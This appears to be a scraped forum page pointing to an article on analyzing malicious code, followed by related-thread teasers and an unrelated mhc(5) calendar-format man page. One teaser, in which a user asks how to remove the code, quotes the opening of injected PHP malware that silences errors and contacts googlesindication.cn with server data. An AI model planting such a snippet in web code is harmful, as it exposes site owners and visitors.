08-04-2010
How to analyze malicious code
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
These 2 Users Gave Thanks to pludi For This Post:
8 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
I have a file which contains records in the format of
2006-08-25 12:06:13|ABC|93
2006-08-25 12:45:55|ABC|203
2006-08-25 01:48:19|DEF|156
2006-08-25 01:49:09|ABC|12798
2006-08-25 02:49:59|GHL|4109
2006-08-25 03:50:50|DEF|234
where the format is "arrive time"|"message type"|"processing... (3 Replies)
Discussion started by: mpang_
3 Replies
2. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
3. Solaris
Hi Gurus,
I have installed the stuff needed for patchdiag for patching, its working okay , however after execution of pathcdiag.sparc i am unable to understand the summury which is produced at the end.
Please help !
Thanks (3 Replies)
Discussion started by: kumarmani
3 Replies
4. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
5. Programming
Hi, I have two files:
Input_file1.txt
124
235
152
178
156
142
178
163
159
Input_file2.txt
124|5623
452|6698
178|9995
235|7542
159|8852 (1 Reply)
Discussion started by: cpp_beginner
1 Replies
6. Solaris
Hi,
Is there any tool is available for analyzing Oracle X86 snapshot output.
Thanks in advance. (1 Reply)
Discussion started by: sunnybee
1 Replies
7. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
8. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
mhc(5) File Formats Manual mhc(5)
NAME
mhc - Message Harmonized Calendaring system
DESCRIPTION
This manual page documents briefly the mhc file format. This manual page was written for the Debian GNU/Linux distribution because the
original program does not have a manual page.
FIELDS
Mhc file format is based on STD11/RFC822: Standard for the format of ARPA Internet text messages. In mhc file, the following extra header
fields are used.
X-SC-Day:
Date of event in format yyyymmdd. You can specify multiple date with space separated like:
X-SC-Day: 19990409 19990413
which means April 9th 1999 and April 13th 1999.
X-SC-Time:
Time of event in format hh:mm-hh:mm or hh:mm. For event which has no meanings about time, you can leave it empty in this field.
X-SC-Duration:
Period of event in yyyymmdd-yyyymmdd. You can omit start date or end date, like "19991121-". X-SC-Duration: is used only to limit
date specified by X-SC-Day: or X-SC-Cond, so you can't describe event date only by X-SC-Duration:. If X-SC-Duration: is empty, it
means no limit.
X-SC-Cond:
Condition of event date by using following keyword.
00-31 Day of month.
1st 2nd 3rd 4th 5th Last Week in month.
Sun Mon ... Sat Day of week.
Jan Feb ... Dec Month
Examples,
X-SC-Cond: Tue Fri
Every Tuesday and Friday.
X-SC-Cond: 31 Aug
Every August 31th.
X-SC-Cond: 1st 3rd Fri
Every 1st and 3rd Friday.
X-SC-Cond: Fri
X-SC-Day: !19990409
Every Friday, but except April 9th 1999.
X-SC-Cond: Fri 13
Every 13th and Every Friday, not 13th Friday.
X-SC-Alarm:
Hint for alarm of event. Currently, mhc.el doesn't alaram, but gemcal will pop-up alarm window. It will be useful if you transfer
this event to PalmOS. In X-SC-Alarm:, you can specify the number (1 to 99) with suffix such as minute, hour or day. For example,
X-SC-Alarm: 10 minutes
Alarm 10 minutes before event.
X-SC-Alarm: 3 hour
Alarm 3 hours before event.
X-SC-Alarm: 3 day
Alarm 3 day before event.
X-SC-Subject:
Subject of event. unstructured?
X-SC-Location:
Location of event. unstructured?
X-SC-Category
Category of event. Any keyword, space separeated. Case ignored.
X-SC-Recoard-Id:
Internal use only.
SEE ALSO
adb2mhc(1) gemcal(1), mhc-sync(1), mhc2palm(1), palm2mhc(1), today(1).
AUTHOR
This program was written by Yoshinari Nomura <nom@quickhack.net> and this manual page was written by Fumitoshi UKAI <ukai@debian.or.jp>,
for the Debian GNU/Linux system (but may be used by others).
23 Jun 2000 mhc(5)